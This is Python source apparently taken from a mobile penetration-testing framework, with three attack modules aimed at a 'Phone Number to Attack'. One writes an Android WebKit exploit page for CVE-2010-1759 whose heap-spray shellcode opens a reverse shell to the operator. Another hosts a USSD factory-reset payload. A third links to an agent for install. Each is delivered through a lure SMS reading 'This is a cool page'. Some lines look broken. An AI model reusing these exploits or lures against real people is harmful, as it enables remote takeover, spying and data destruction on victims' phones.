def client_side(): # TODO: fix a lot webserver = config.get("Web", "server") # ipaddress = config.get('Web', 'ipaddress') shellipaddress = config.get("Web", "shellipaddress") cs = ["CVE 2010-1759 Webkit Vuln Android"] choice = menu(cs) if choice in (0, "Error"): return 0 elif choice == 1: path = str(raw_input(color(33, "[-] Hosting Path: "))) filename = str(raw_input(color(33, "[-] Filename: "))) ipaddress = str(raw_input(color(33, "[-] Local IP address: "))) number = str(raw_input(color(33, "[-] Phone Number to Attack: "))) link = "http://%s%s%s" % (ipaddress, path, filename) fullpath = webserver + path command1 = "mkdir %s" % fullpath system(command1) octets = shellipaddress.split(".") out1 = struct.pack("b", int(octets[0])) hex1 = hex(out1) out2 = struct.pack("b", int(octets[1])) hex2 = hex(out2) out3 = struct.pack("b", int(octets[2])) hex3 = hex(out3) out4 = struct.pack("b", int(octets[3])) hex4 = hex(out4) sploitfile = "%s%s" % (fullpath, filename) command8 = "touch %s" % sploitfile system(command8) command9 = "chmod 777 %s" % sploitfile system(command9) file = open(sploitfile, "w") text = [ "<html>\n", "<head>\n", "<script>\n", 'var ip = unescape("\\u' + hex2 + hex1 + "\\u" + hex4 + hex3 + '");\n', 'var port = unescape("\\u3930");\n', "function trigger()\n", "{\n", 'var span = document.createElement("div");\n', 'document.getElementById("BodyID").appendChild(span);\n', 'span.innerHTML = -parseFloat("NAN(ffffe00572c60)");\n', "}\n", "function exploit()\n", "{\n", 'var nop = unescape("\\u33bc\\u0057");\n', "do\n", "{\n", "nop+=nop;\n", "} while (nop.length<=0x1000);\n", 'var scode = nop+unescape("\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002");\n', "scode += port;\n", "scode += ip;\n", 'scode += unescape("\\u2000\\u2000");\n', "target = new Array();\n", "for(i = 0; i < 0x1000; i++)\n", "target[i] = scode;\n", "for (i = 0; i <= 0x1000; i++)\n", "{\n", 'document.write(target[i]+"<i>");\n', "if (i>0x999)\n", "{\n", "trigger();\n", "}\n", "}\n", "}\n", "</script>\n", "</head>\n", '<body id="BodyID">\n', "Enjoy!\n", "<script>\n", "exploit();\n", "</script>\n", "</body>\n", "</html>\n", ] file.writelines(text) file.close() modem = get_modem() if modem == 0: print color(31, "\n[!] No modems found. Attach a modem to use this functionality\n") return 1 # Read SQL vars from config sqlserver = config.get("SQL", "server") username = config.get("SQL", "username") password = config.get("SQL", "password") db = MySQLdb.connect(sqlserver, username, password, "framework") pathquery = "SELECT %s from modems where id=%s" % ("path", modem) path2 = db_exec_rows(pathquery) keyquery = "SELECT %s from modems where id=%s" % ("controlkey", modem) key2 = db_exec_rows(keyquery) modemtypequery = "SELECT %s from modems where id=%s" % ("type", modem) modemtype2 = db_exec_rows(modemtypequery) if modemtype2 == "usb": # Interface with USB modem usb = serial.serialposix(port="/dev/ttyUSB2", baudrate=115200, bytesize=8, parity="N", stopbits=1) usb.write("ATZ\r\n") sleep(1) line = read_modem(usb) print line sleep(1) usb.write("AT+CMGF=1\r\n") line = read_modem(usb) print line sleep(1) numberline = 'AT+CMGS="%s"\r\n' % number usb.write(numberline) line = read_modem(usb) print line sleep(1) msg = "This is a cool page: %s" % link usb.write(struct.pack("b", 26, msg)) sleep(2) line = read_modem(usb) print line sleep(1) usb.close() elif modemtype2 == "app": # Interface with app-based modem control = "%s%s/getfunc" % (webserver, path2) command2 = "%s SEND %s This is a cool page: %s" % (key2, number, link) file = open(control, "w") file.write(command2) file.close() vulnerable = "no" # socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180); s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((str(shellipaddress), 12345)) if data_socket == socket.accept(): data = "/system/bin/id\n" data_socket.write(data) data = data_socket() print data close(data_socket) vulnerable = "yes" print color(32, "\n[+] Vulnerable: %s\n" % vulnerable) table = "client" global db number2 = '"%s"' % number vulnerable2 = '"%s"' % vulnerable webkit = '"webkit"' insertquery = "INSERT INTO %s (id,number,exploit,vuln) VALUES (DEFAULT,%s,%s,%s)" % ( table, number2, webkit, vulnerable2, ) cursor = db.cursor() sql = cursor.execute(insertquery) return 0 return 1
def ussd(ussd=None): webroot = config.get('Web', 'webroot') ipaddress = config.get('Web', 'ipaddress') if ussd == None: ussd = "*2767*3855%23" print '' print color(31, "[!] WARNING: THIS CAN FACTORY RESET YOUR PHONE IF VULNERABLE.") print color(31, "[ ] FOR PROOF OF CONCEPT USE ONLY!") print color(31, "[ ] USE THE SAFE VERSION ON PENTESTS") print '' path = str(raw_input(color(33, "[-] Hosting Path (%s+input): " % webroot))) filename = str(raw_input(color(33, "[-] Filename: " ))) number = str(raw_input(color(33, "[-] Phone Number to Attack: "))) if path[0] != '/': path = '/'+path if filename[0] != '/': filename = '/'+filename link = "http://"+ipaddress+path+filename fullpath = webroot+path command1 = "mkdir "+fullpath system(command1) sploitfile = fullpath+filename command8 = "touch "+sploitfile system(command8) command9 = "chmod 777 "+sploitfile system(command9) # File modification here sploit2 = "/redirect.html" sploitfile2 = fullpath+sploit2 text = ['<html>\n', '\t<head>\n', '\t\t<meta http-equiv="refresh" content="1;url=http://'+ipaddress+path+sploit2+'">\n', '\t</head>\n', '\t<frameset>\n', '\t\t<frame src="tel:'+ussd+'" />\n', '\t</frameset>\n', '</html>\n' ] file = open(sploitfile, 'w') file.writelines(text) file.close() command8 = "touch "+sploitfile2 system(command8) command9 = "chmod 777 "+sploitfile2 system(command9) text2 = ['<html>\n', '\t<frameset>\n', '\t\t<frame src="tel:'+ussd+'" />\n', '\t</frameset>\n', '</html>\n' ] file = open(sploitfile2, 'w') file.writelines(text2) file.close() modem = get_modem() if modem == 0: print color(31, '\n[!] No modems found. Attach a modem to use this functionality\n') return 0 cursor = db.cursor() pathquery = 'SELECT %s from modems where id=%s' % ('path', modem) cursor.execute(pathquery) results = cursor.fetchall() path2 = results[0] keyquery = 'SELECT %s from modems where id=%s' % ('controlkey', modem) cursor.execute(keyquery) results = cursor.fetchall() key2 = results[0] modemtypequery = 'SELECT %s from modems where id=%s' % ('type', modem) cursor.execute(modemtypequery) results = cursor.fetchall() modemtype2 = results[0] if modemtype2 == 'usb': try: usb = serial.serialposix(port='/dev/ttyUSB2', baudrate=115200, bytesize=8, parity='N', stopbits=1) usb.write('ATZ\r\n') sleep(1) line = read_modem(usb) print line sleep(1) usb.write('AT+CMGF=1\r\n') line = read_modem(usb) print line sleep(1) numberline = 'AT+CMGS="%s"\r\n' % number usb.write(numberline) line = read_modem(usb) print line sleep(1) msg = 'This is a cool page: %s' % link usb.write(struct.pack('b',26, msg)) sleep(2) line = read_modem(usb) print line sleep(1) usb.close() print color(32, '[+] Data sent!') return 0 except Exception, e: print color(31, '[!] Error: %s' % e) x = ussd() return x
def direct_download(): #TODO: cleanup webserver = config.get('Web', 'server') ipaddress = config.get('Web', 'ipaddress') print color(35, '[*] This module sends an SMS with a link to directly download and install an Agent\n') print color(31, '[!] ONLY Android currently Supported') #platform = str(raw_input('Platform(Android/iPhone/Blackberry): ')) platform = 'android' # Lots of potential for error with the way this is handled, would # prefer safer execution path = str(raw_input(color(33, '[-] Hosting Path: ' ))) filename = str(raw_input(color(33, '[-] Filename: ' ))) number = str(raw_input(color(33, '[-] Phone Number to Attack: '))) if platform.lower() == 'android': link = 'http://%s%s%s' % (ipaddress, path, filename) fullpath = '%s%s' % (webserver, path) command1 = 'mkdir %s' % fullpath system(command1) global location # Android agent location command = 'cp %s %s%s%s'% (location, webserver, path, filename) system(command) modem = get_modem() if modem == 0: print color(31, '\n[!] No modems found. Attach a modem to use this functionality\n') return 0 else: pathquery = "SELECT %s from modems where id=%s" % ('path', modem) path2 = db_exec_rows(pathquery) keyquery = "SELECT %s from modems where id=%s" % ('controlkey', modem) key2 = db_exec_rows(keyquery) modemtypequery = "SELECT %s from modems where id=%s" % ('type', modem) modemtype2 = db_exec_rows(modemtypequery) if modemtype2 == 'usb': usb = serial.serialposix(port='/dev/ttyUSB2', baudrate=115200, bytesize=8, parity='N', stopbits=1) usb.write('ATZ\r\n') sleep(1) line = read_modem(usb) print line sleep(1) usb.write('AT+CMGF=1\r\n') line = read_modem(usb) print line sleep(1) numberline = 'AT+CMGS="%s"\r\n' % number usb.write(numberline) line = read_modem(usb) print line sleep(1) msg = 'This is a cool app: %s' % link usb.write(struct.pack('b', 26, msg)) sleep(5) line = read_modem(usb) print line sleep(1) usb.close() elif modemtype2 == 'app': control = '%s%s/getfunc' % (webserver, path2) command2 = '%s SEND %s This is a cool app: %s' % (key2, number, link) file = open(control, 'w') file.write(command2) file.close() return 0